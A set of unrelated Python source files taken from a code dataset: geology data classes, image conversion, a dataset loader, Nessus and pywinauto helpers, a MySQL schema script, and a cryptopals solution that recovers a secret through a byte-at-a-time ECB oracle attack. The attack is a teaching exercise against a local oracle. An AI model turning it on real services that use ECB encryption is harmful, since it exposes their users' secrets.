'definition': 'Diepte van de onderkant van de laag hydrogeologische '
'stratigrafie in meter.',
'type': 'float',
'notnull': False
}, {
'name': 'aquifer',
'source': 'xml',
'sourcefield': '/aquifer',
'definition': 'code van de watervoerende laag waarin de laag '
'Hydrogeologische stratigrafie zich bevindt.',
'type': 'string',
'notnull': False
}]
def __init__(self):
"""Initialisation."""
super(HydrogeologischeStratigrafieLaag, self).__init__(
'hydrogeologische_interpretatie_laag')
@classmethod
def from_xml_element(cls, element):
"""Build an instance of this subtype from a single XML element.
Parameters
----------
element : etree.Element
XML element representing a single record of this subtype.
"""
laag = HydrogeologischeStratigrafieLaag()
for field in cls.get_fields().values():
laag.data[field['name']] = laag._parse(
func=element.findtext,
xpath=field['sourcefield'],
namespace=None,
returntype=field.get('type', None)
)
return laag
class HydrogeologischeStratigrafie(AbstractDovType):
"""Class representing the DOV data type for boreholes."""
_subtypes = [HydrogeologischeStratigrafieLaag]
_fields = [{
'name': 'pkey_interpretatie',
'source': 'wfs',
'sourcefield': 'Interpretatiefiche',
'type': 'string'
}, {
'name': 'pkey_boring',
'source': 'custom',
'type': 'string',
'definition': 'URL die verwijst naar de gegevens van de boring '
'waaraan deze hydrogeologische stratigrafie '
'gekoppeld is '
'(indien gekoppeld aan een boring).',
'notnull': False
}, {
'name': 'pkey_sondering',
'source': 'custom',
'type': 'string',
'definition': 'URL die verwijst naar de gegevens van de sondering '
'waaraan deze informele stratigrafie gekoppeld is ('
'indien gekoppeld aan een sondering).',
'notnull': False
}, {
'name': 'betrouwbaarheid_interpretatie',
'source': 'wfs',
'sourcefield': 'Betrouwbaarheid',
'type': 'string'
}, {
'name': 'x',
'source': 'wfs',
'sourcefield': 'X_mL72',
'type': 'float'
}, {
'name': 'y',
'source': 'wfs',
'sourcefield': 'Y_mL72',
'type': 'float'
}]
def __init__(self, pkey):
"""Initialisation.
Parameters
----------
pkey : str
Permanent key of the Hydrogeologische stratigrafie, being a URI
of the form
`https://www.dov.vlaanderen.be/data/boring/<id>`.
"""
super(HydrogeologischeStratigrafie, self).__init__(
'interpretatie', pkey)
@classmethod
def from_wfs_element(cls, feature, namespace):
"""Build 'HydrogeologischeStratigrafie' instance from a WFS feature
element.
Parameters
----------
feature : etree.Element
XML element representing a single record of the WFS layer.
namespace : str
Namespace associated with this WFS featuretype.
Returns
-------
HydrogeologischeStratigrafie : HydrogeologischeStratigrafie
An instance of this class populated with the data from the WFS
element.
"""
hydstrat = HydrogeologischeStratigrafie(
feature.findtext('./{%s}Interpretatiefiche' % namespace))
typeproef = cls._parse(
func=feature.findtext,
xpath='Type_proef',
namespace=namespace,
returntype='string'
)
if typeproef == 'Boring':
hydstrat.data['pkey_boring'] = cls._parse(
func=feature.findtext,
xpath='Proeffiche',
namespace=namespace,
returntype='string'
)
hydstrat.data['pkey_sondering'] = np.nan
elif typeproef == 'Sondering':
hydstrat.data['pkey_sondering'] = cls._parse(
func=feature.findtext,
xpath='Proeffiche',
namespace=namespace,
returntype='string'
)
hydstrat.data['pkey_boring'] = np.nan
else:
hydstrat.data['pkey_boring'] = np.nan
hydstrat.data['pkey_sondering'] = np.nan
for field in cls.get_fields(source=('wfs',)).values():
if field['name'] in ['pkey_boring', 'pkey_sondering']:
continue
hydstrat.data[field['name']] = cls._parse(
func=feature.findtext,
xpath=field['sourcefield'],
namespace=namespace,
returntype=field.get('type', None)
)
return hydstrat
class LithologischeBeschrijvingLaag(AbstractDovSubType):
_name = 'lithologische_beschrijving_laag'
_rootpath = './/lithologischebeschrijving/laag'
_fields = [{
'name': 'diepte_laag_van',
'source': 'xml',
'sourcefield': '/van',
'definition': 'Diepte van de bovenkant van de laag lithologische '
'beschrijving in meter.',
'type': 'float',
'notnull': False
}, {
'name': 'diepte_laag_tot',
'source': 'xml',
'sourcefield': '/tot',
'definition': 'Diepte van de onderkant van de laag lithologische '
'beschrijving in meter.',
'type': 'float',
'notnull': False
}, {
'name': 'beschrijving',
'source': 'xml',
'sourcefield': '/beschrijving',
'definition': 'Lithologische beschrijving van de laag in vrije tekst '
'(onbeperkt in lengte)',
'type': 'string',
'notnull': False
}]
def __init__(self):
"""Initialisation."""
super(LithologischeBeschrijvingLaag, self).__init__(
'lithologische_beschrijving_laag')
@classmethod
def from_xml_element(cls, element):
"""Build an instance of this subtype from a single XML element.
Parameters
----------
element : etree.Element
XML element representing a single record of this subtype.
"""
laag = LithologischeBeschrijvingLaag()
for field in cls.get_fields().values():
laag.data[field['name']] = laag._parse(
func=element.findtext,
xpath=field['sourcefield'],
namespace=None,
returntype=field.get('type', None)
)
return laag
class LithologischeBeschrijvingen(AbstractDovType):
"""Class representing the DOV data type for 'lithologische
beschrijvingen' interpretations."""
_subtypes = [LithologischeBeschrijvingLaag]
_fields = [{
'name': 'pkey_interpretatie',
'source': 'wfs',
'sourcefield': 'Interpretatiefiche',
'type': 'string'
}, {
'name': 'pkey_boring',
'source': 'wfs',
'type': 'string',
'sourcefield': 'Proeffiche',
}, {
'name': 'betrouwbaarheid_interpretatie',
'source': 'wfs',
'sourcefield': 'Betrouwbaarheid',
'type': 'string'
}, {
'name': 'x',
'source': 'wfs',
'sourcefield': 'X_mL72',
'type': 'float'
}, {
'name': 'y',
'source': 'wfs',
'sourcefield': 'Y_mL72',
'type': 'float'
}]
def __init__(self, pkey):
"""Initialisation.
Parameters
----------
pkey : str
Permanent key of the 'Lithologische beschrijvingen', being a URI
of the form
`https://www.dov.vlaanderen.be/data/interpretaties/<id>`.
"""
super(LithologischeBeschrijvingen, self).__init__(
'interpretatie', pkey)
@classmethod
def from_wfs_element(cls, feature, namespace):
"""Build 'LithologischeBeschrijvingen' instance from a WFS feature
element.
Parameters
----------
feature : etree.Element
XML element representing a single record of the WFS layer.
namespace : str
Namespace associated with this WFS featuretype.
Returns
-------
LithologischeBeschrijvingen : LithologischeBeschrijvingen
An instance of this class populated with the data from the WFS
element.
"""
lithobes = LithologischeBeschrijvingen(
feature.findtext('./{%s}Interpretatiefiche' % namespace))
for field in cls.get_fields(source=('wfs',)).values():
lithobes.data[field['name']] = cls._parse(
func=feature.findtext,
xpath=field['sourcefield'],
namespace=namespace,
returntype=field.get('type', None)
)
return lithobes
| StarcoderdataPython |
1604564 | from matplotlib import pyplot as plt
import matplotlib.image as mpimg
import numpy
#image = "ct34"
image_ext = ".jpg"
image_list = ["ct1","ct3","ct4","ct5","ct6","ct7","ct8","ct9","ct10","ct11","ct12","ct13",
"ct14","ct15","ct16","ct17","ct18","ct19","ct20","ct21","ct22","ct23","ct24","ct25","ct26",
"ct27","ct28","ct29","ct30","ct31","ct32","ct33","ct34", "ct35"]
methods = ["BT601", "BT709"]
method = "BT601"
for current_image in image_list:
# img = mpimg.imread(image + image_ext) #Get the image
img = mpimg.imread(current_image + image_ext)
for method in methods:
R, G, B = img[:,:,0], img[:,:,1], img[:,:,2] #Split RGB channels
if method == "BT601":
imgGray = 0.2989 * R + 0.5870 * G + 0.1140 * B #Convert all channels to grayscale.
elif method == "BT709":
imgGray = 0.2126 * R + 0.7152 * G + 0.0722 * B
elif method == "Decomposition_MAX":
imgGray = numpy.copy(img)
for ix in range(len(img)):
for iy in range(len(img[ix])):
val = max(img[ix, iy, 0], img[ix, iy, 1], img[ix, iy, 2]) #Determine max value of channels.
imgGray[ix, iy, 0] = val #Set all channels to the same value.
imgGray[ix, iy, 1] = val
imgGray[ix, iy, 2] = val
elif method == "Decomposition_MIN":
imgGray = numpy.copy(img)
for ix in range(len(img)):
for iy in range(len(img[ix])):
val = min(img[ix, iy, 0], img[ix, iy, 1], img[ix, iy, 2]) #Determine min value of channels.
imgGray[ix, iy, 0] = val #Set all channels to the same value.
imgGray[ix, iy, 1] = val
imgGray[ix, iy, 2] = val
plt.title(current_image + "_" + method + image_ext)
fig = plt.gcf()
fig.canvas.set_window_title(current_image + "_" + method + image_ext)
mpimg.imsave(current_image + "_" + method + image_ext, imgGray, cmap='gray')
# plt.imshow(imgGray, cmap='gray') #Show the image.
# plt.show()
| StarcoderdataPython |
7438 | # Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Tuple
import tensorflow as tf
from fastestimator.dataset.numpy_dataset import NumpyDataset
def load_data(image_key: str = "x", label_key: str = "y") -> Tuple[NumpyDataset, NumpyDataset]:
"""Load and return the CIFAR10 dataset.
Please consider using the ciFAIR10 dataset instead. CIFAR10 contains duplicates between its train and test sets.
Args:
image_key: The key for image.
label_key: The key for label.
Returns:
(train_data, eval_data)
"""
print("\033[93m {}\033[00m".format("FastEstimator-Warn: Consider using the ciFAIR10 dataset instead."))
(x_train, y_train), (x_eval, y_eval) = tf.keras.datasets.cifar10.load_data()
train_data = NumpyDataset({image_key: x_train, label_key: y_train})
eval_data = NumpyDataset({image_key: x_eval, label_key: y_eval})
return train_data, eval_data
| StarcoderdataPython |
1633175 | <filename>cryptopals/set2/challenge12.py
#!/usr/bin/env python3
import base64
from typing import Tuple
from functions.aes import gen_random_bytes, AESCipher, pkcs7_pad
RESULT = b"""Rollin' in my 5.0
With my rag-top down so my hair can blow
The girlies on standby waving just to say hi
Did you stop? No, I just drove by
"""
_SECRET = base64.b64decode(
"<KEY>"
"<KEY>"
"<KEY>"
"YnkK"
)
_ecb = AESCipher(AESCipher.MODE_ECB, gen_random_bytes(16))
def _encrypt_it(bytes_: bytes) -> bytes:
pt = bytes_ + _SECRET
ct = _ecb.encrypt(pkcs7_pad(pt))
return ct
def _get_info() -> Tuple[int, int]:
length_without_padding = len(_encrypt_it(bytes()))
length_with_padding = length_without_padding
padding = bytes()
while length_with_padding == length_without_padding:
padding += b"\x00"
length_with_padding = len(_encrypt_it(padding))
block_size = length_with_padding - length_without_padding
if len(padding) < block_size:
data_len = length_without_padding - len(padding)
else:
data_len = length_without_padding - block_size
return block_size, data_len
def challenge12() -> bytes:
block_size, data_len = _get_info()
data_num_block = data_len // block_size + (data_len % block_size > 0)
padding = b"\x00" * data_num_block * block_size
data_block = b"\x00" * block_size
data = bytes()
while len(data) < data_len:
padding = padding[1:]
data_block = data_block[1:]
possible_blocks = {
_encrypt_it(data_block + bytes([i]))[:block_size]: data_block + bytes([i])
for i in range(256)
}
ct = _encrypt_it(padding)[
(data_num_block - 1) * block_size : data_num_block * block_size
]
for pb in possible_blocks.items():
if pb[0] == ct:
byte = bytes([pb[1][block_size - 1]])
data_block += byte
data += byte
break
return data
if __name__ == "__main__":
res = challenge12()
assert res == RESULT, "The result does not match the expected value"
print("Ok")
| StarcoderdataPython |
3387870 | import pytest
import responses
@responses.activate
def test_proxy_edit(nessus):
responses.add(responses.PUT,
'https://localhost:8834/settings/network/proxy'
)
nessus.proxy.edit(proxy='proxy.company.com',
proxy_auth='auto',
proxy_password='password',
proxy_username='username',
proxy_port=8080,
user_agent='Proxy UserAgent'
)
@responses.activate
def test_proxy_details(nessus):
responses.add(responses.GET,
'https://localhost:8834/settings/network/proxy',
json={
'proxy': 'proxy.company.com',
'proxy_auth': 'basic',
'proxy_password': '<PASSWORD>',
'proxy_username': 'user',
'proxy_port': 8080,
'user_agent': 'Awesome Useragent'
})
resp = nessus.proxy.details()
assert isinstance(resp, dict)
assert resp['proxy'] == 'proxy.company.com'
| StarcoderdataPython |
115216 | # GUI Application automation and testing library
# Copyright (C) 2006 <NAME>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
"""Wrap"""
__revision__ = "$Rev: 439 $"
try:
import pywinauto
except ImportError:
import sys
sys.path.append("..")
from .win32structures import RECT, LOGFONTW
#====================================================================
class func_wrapper(object):
"Little class to allow attribute access to return a callable object"
def __init__(self, value):
self.value = value
def __call__(self, *args, **kwargs):
"Return the saved value"
return self.value
#====================================================================
class ControlProps(dict):
"Wrap controls read from a file to resemble hwnd controls"
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.ref = None
#self.MenuItems = []
def __getattr__(self, attr):
# if the key is not in the dictionary but the plural is
if attr not in self and attr + "s" in self:
# return the first element of the possible list item
return func_wrapper(self[attr+'s'][0])
return func_wrapper(self[attr])
#def FriendlyClassName(self):
# print "sdafafasdfafasdfasdf",
# try:
# print "---", self['FriendlyClassName']
# except Exception, e:
# print "fffffffffffffffffffff"
# print `e`
# return self['FriendlyClassName']
def WindowText(self):
return self['Texts'][0]
def HasStyle(self, style):
return self['Style'] & style == style
def HasExStyle(self, exstyle):
return self['ExStyle'] & exstyle == exstyle
#====================================================================
def GetMenuBlocks(ctrls):
allMenuBlocks = []
for ctrl in ctrls:
if 'MenuItems' in ctrl:
# we need to get all the separate menu blocks!
menuBlocks = MenuBlockAsControls(ctrl.MenuItems())
allMenuBlocks.extend(menuBlocks)
return allMenuBlocks
#====================================================================
def MenuBlockAsControls(menuItems, parentage = []):
blocks = []
curBlock = []
for item in menuItems:
# do a bit of conversion first :-)
itemAsCtrl = MenuItemAsControl(item)
# update the FriendlyClassName to contain the 'path' to
# this particular item
# TODO: CHECK - as itemPath is currently unused!
if parentage:
itemPath = "%s->%s" % ("->".join(parentage), item['Text'])
else:
itemPath = item['Text']
#append the item to the current menu block
curBlock.append(itemAsCtrl)
# If the item has a sub menu
if 'MenuItems' in item:
# add the current item the path
parentage.append(item['Text'])
# Get the block for the SubMenu, and add it to the list of
# blocks we have found
blocks.extend(
MenuBlockAsControls(
item['MenuItems']['MenuItems'], parentage))
# and seeing as we are dong with that sub menu remove the current
# item from the path
del(parentage[-1])
# add the current block to the list of blocks
blocks.append(curBlock)
return blocks
#====================================================================
def MenuItemAsControl(menuItem):
"Make a menu item look like a control for tests"
itemAsCtrl = ControlProps()
itemAsCtrl["Texts"] = [menuItem['Text'], ]
itemAsCtrl["ControlID"] = menuItem['ID']
itemAsCtrl["Type"] = menuItem['Type']
itemAsCtrl["State"] = menuItem['State']
itemAsCtrl["Class"] = "MenuItem"
itemAsCtrl["FriendlyClassName"] = "MenuItem"
# as most of these don't matter - just set them up with default stuff
itemAsCtrl["Rectangle"] = RECT(0, 0, 999, 999)
itemAsCtrl["Fonts"] = [LOGFONTW(), ]
itemAsCtrl["ClientRects"] = [RECT(0, 0, 999, 999), ]
itemAsCtrl["ContextHelpID"] = 0
itemAsCtrl["UserData"] = 0
itemAsCtrl["Style"] = 0
itemAsCtrl["ExStyle"] = 0
itemAsCtrl["IsVisible"] = 1
return itemAsCtrl
#====================================================================
def SetReferenceControls(controls, refControls):
"""Set the reference controls for the controls passed in
This does some minor checking as following:
* test that there are the same number of reference controls as
controls - fails with an exception if there are not
* test if all the ID's are the same or not
"""
# numbers of controls must be the same (though in future I could imagine
# relaxing this constraint)
if len(controls) != len(refControls):
raise RuntimeError(
"Numbers of controls on ref. dialog does not match Loc. dialog")
# set the controls
for i, ctrl in enumerate(controls):
ctrl.ref = refControls[i]
toRet = 1
allIDsSameFlag = 2
allClassesSameFlag = 4
# find if all the control id's match
if [ctrl.ControlID() for ctrl in controls] == \
[ctrl.ControlID() for ctrl in refControls]:
toRet += allIDsSameFlag
# check if the control classes match
if [ctrl.Class() for ctrl in controls] == \
[ctrl.Class() for ctrl in refControls]:
toRet += allClassesSameFlag
return toRet
##====================================================================
#class ControlProps(dict):
# #----------------------------------------------------------------
# def __init__(self, props = {}):
# # default to having menuItems for all things
# self.MenuItems = []
#
# self.update(props)
# #for x in props:
# #self[x] = props[x]
#
# if hasattr(props, "handle"):
# self.__dict__['handle'] = props.handle
# else:
# self.__dict__['handle'] = None
#
# self.__dict__['ref'] = None
#
# #----------------------------------------------------------------
# # handles attribute access for dictionary items and
# # for plurals (e.g. if self.Fonts = [4, 2] then self.Font = 4)
# def __getattr__(self, key):
#
# # if the key is not in the dictionary but the plural is
# if key not in self and key + "s" in self:
#
# # try to get the first element of the possible list item
# try:
# return self[key + "s"][0]
# except TypeError, e:
# pass
#
# if key in self:
# return self[key]
#
# return self.__dict__[key]
#
# #----------------------------------------------------------------
# def __setattr__(self, key, value):
# if key in self.__dict__:
# self.__dict__[key] = value
# else:
# self[key] = value
#
# #----------------------------------------------------------------
# def HasStyle(self, flag):
# return self.Style & flag == flag
#
# #----------------------------------------------------------------
# def HasExStyle(self, flag):
# return self.ExStyle & flag == flag
#
#
| StarcoderdataPython |
28589 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 09 22:25:07 2019
@author: arnaudhub
"""
#import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.sql import text
import configparser,os
from urllib import parse
#import sql.connector
config = configparser.ConfigParser()
config.read_file(open(os.path.expanduser("~/Bureau/OBJDOMO.cnf")))
DB = "OBJETDOMO_V13_1.1?charset=utf8"
CNF="OBJDOMO"
engine = create_engine("mysql://%s:%s@%s/%s" % (config[CNF]['user'], parse.quote_plus(config[CNF]['password']), config[CNF]['host'], DB))
user = config['OBJDOMO']['user']
password=config['<PASSWORD>']['password']
import mysql.connector
from mysql.connector import Error
try:
connection = mysql.connector.connect(host="127.0.0.1",
database="OBJETDOMO_V13_1.1",
user=user,
password=password)
cursor = connection.cursor()
cursor.execute("""SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;""")
cursor.execute("""SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;""")
cursor.execute("""SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';""")
cursor.execute("""DROP SCHEMA IF EXISTS `OBJETDOMO_V13_1.1`;""")
print("DROP SCHEMA")
cursor.execute("""CREATE SCHEMA IF NOT EXISTS `OBJETDOMO_V13_1.1` DEFAULT CHARACTER SET utf8 ;""")
cursor.execute("""USE `OBJETDOMO_V13_1.1`;""")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (
`TAD_ID` INT NOT NULL AUTO_INCREMENT,
`TAD_LIBELLE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TAD_ID`))
ENGINE = InnoDB;""")
print("T_A_TYPE_ADRESSE_TAD Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (
`GEN_ID` INT NOT NULL AUTO_INCREMENT,
`GEN_LIBELLE` VARCHAR(16) NOT NULL,
PRIMARY KEY (`GEN_ID`))
ENGINE = InnoDB;""")
print("T_R_GENRE_GEN Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (
`STT_ID` INT NOT NULL AUTO_INCREMENT,
`STT_LIBELLE` VARCHAR(45) NOT NULL,
`STT_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`STT_ID`))
ENGINE = InnoDB;""")
print("T_A_STATUT_STT Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (
`PRS_ID` INT NOT NULL AUTO_INCREMENT,
`PRS_NOM` VARCHAR(40) NOT NULL,
`PRS_PRENOM` VARCHAR(40) NOT NULL,
`GEN_ID` INT NOT NULL,
`PRS_NOTES` VARCHAR(300) NULL,
`STT_ID` INT NOT NULL,
PRIMARY KEY (`PRS_ID`),
INDEX `fk_TE_PERSONNE_PRS_1_idx` (`GEN_ID` ASC),
INDEX `fk_TE_PERSONNE_PRS_2_idx` (`STT_ID` ASC),
INDEX `index4` (`PRS_NOM` ASC, `PRS_PRENOM` ASC),
CONSTRAINT `fk_TE_PERSONNE_PRS_1`
FOREIGN KEY (`GEN_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (`GEN_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS_2`
FOREIGN KEY (`STT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (`STT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PERSONNEPHYSIQUE_PRS Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (
`CITY_ID` INT NOT NULL AUTO_INCREMENT,
`CITY_CODEPOSTAL` CHAR(5) NOT NULL,
`CITY_COMMUNE` VARCHAR(60) NOT NULL,
PRIMARY KEY (`CITY_ID`),
INDEX `index2` (`CITY_CODEPOSTAL` ASC, `CITY_COMMUNE` ASC))
ENGINE = InnoDB;""")
print("T_A_VILLE_CITY Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (
`ADR_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_VOIEPRINCIPALE` VARCHAR(38) NOT NULL,
`ADR_COMPLEMENTIDENTIFICATION` VARCHAR(38) NOT NULL,
`CITY_ID` INT NOT NULL,
`TAD_ID` INT NOT NULL COMMENT ' ',
PRIMARY KEY (`ADR_ID`),
INDEX `fk_TE_ADRESSE_ADR_1_idx` (`TAD_ID` ASC),
INDEX `fk_TE_ADRESSEPOSTALE_ADR_1_idx` (`CITY_ID` ASC),
CONSTRAINT `fk_TE_ADRESSE_ADR_1`
FOREIGN KEY (`TAD_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (`TAD_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_ADRESSEPOSTALE_ADR_1`
FOREIGN KEY (`CITY_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (`CITY_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_ADRESSEPOSTALE_ADR Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (
`TPDT_ID` INT NOT NULL AUTO_INCREMENT,
`TPDT_CATEGORIE` VARCHAR(60) NULL,
PRIMARY KEY (`TPDT_ID`))
ENGINE = InnoDB;""")
print('T_R_TYPEPRODUIT_TPDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (
`PDT_SERIALNUMBER` INT NOT NULL AUTO_INCREMENT,
`PDT_NOM` VARCHAR(45) NOT NULL,
`PDT_MARQUE` VARCHAR(45) NOT NULL,
`PDT_VALEUR` VARCHAR(45) NOT NULL,
`PDT_HEURE` VARCHAR(45) NOT NULL,
`PDT_DUREE` VARCHAR(45) NOT NULL,
`PDT_SOURCE` VARCHAR(45) NOT NULL,
`PDT_REGLE` VARCHAR(45) NOT NULL,
`TPDT_ID` INT NOT NULL,
PRIMARY KEY (`PDT_SERIALNUMBER`),
INDEX `index2` (`PDT_NOM` ASC, `PDT_MARQUE` ASC),
INDEX `fk_TE_PRODUIT_PDT_1_idx` (`TPDT_ID` ASC),
CONSTRAINT `fk_TE_PRODUIT_PDT_1`
FOREIGN KEY (`TPDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (`TPDT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PRODUIT_PDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` (
`AUTH_ID` INT NOT NULL AUTO_INCREMENT,
`AUTH_USERNAME` VARCHAR(45) NOT NULL,
`AUTH_PASSWORD` VARCHAR(45) NOT NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`AUTH_ID`),
INDEX `index2` (`AUTH_USERNAME` ASC, `AUTH_PASSWORD` ASC),
INDEX `fk_TR_AUTHENTIFICATION_AUTH_1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_AUTHENTIFICATION_AUTH_1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_AUTHENTIFICATION_AUTH Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` (
`LOC_ID` INT NOT NULL AUTO_INCREMENT,
`LOC_LIBELLE` VARCHAR(45) NOT NULL,
`LOC_TYPE` VARCHAR(45) NOT NULL,
`LOC_NOTES` VARCHAR(300) NULL,
PRIMARY KEY (`LOC_ID`),
INDEX `index2` (`LOC_LIBELLE` ASC, `LOC_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_E_LOCALISATIONPRODUIT_LOC Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` (
`TPI_ID` INT NOT NULL AUTO_INCREMENT,
`TPI_LIBELLE` VARCHAR(45) NOT NULL,
`TPI_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TPI_ID`),
INDEX `index2` (`TPI_LIBELLE` ASC, `TPI_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_R_TYPEINTERVENTION_TPI Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (
`AUT_ID` INT NOT NULL AUTO_INCREMENT,
`AUT_DEPENDANCE` VARCHAR(5) NOT NULL,
`AUT_DEFINITION` VARCHAR(105) NOT NULL,
PRIMARY KEY (`AUT_ID`),
INDEX `index2` (`AUT_DEPENDANCE` ASC, `AUT_DEFINITION` ASC))
ENGINE = InnoDB;""")
print('T_A_AUTONOMIE_AUT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (
`CTT_ID` INT NOT NULL AUTO_INCREMENT,
`CTT_INTITULECONTRAT` VARCHAR(45) NOT NULL,
`CTT_REFCONTRAT` VARCHAR(45) NOT NULL,
`AUT_ID` INT NOT NULL,
`CTT_DEBUTCONTRAT` DATE NOT NULL,
`CTT_DATENAISSANCEBENEFICIAIRE` DATE NOT NULL,
`CTT_TEL` VARCHAR(45) NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`CTT_ID`),
INDEX `fk_TR_CONTRAT_CTT_1_idx` (`AUT_ID` ASC),
INDEX `fk_TR_CONTRATBENEFICIAIRE_CTT_TE_PERSONNE_PRS1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_CONTRAT_CTT_1`
FOREIGN KEY (`AUT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (`AUT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
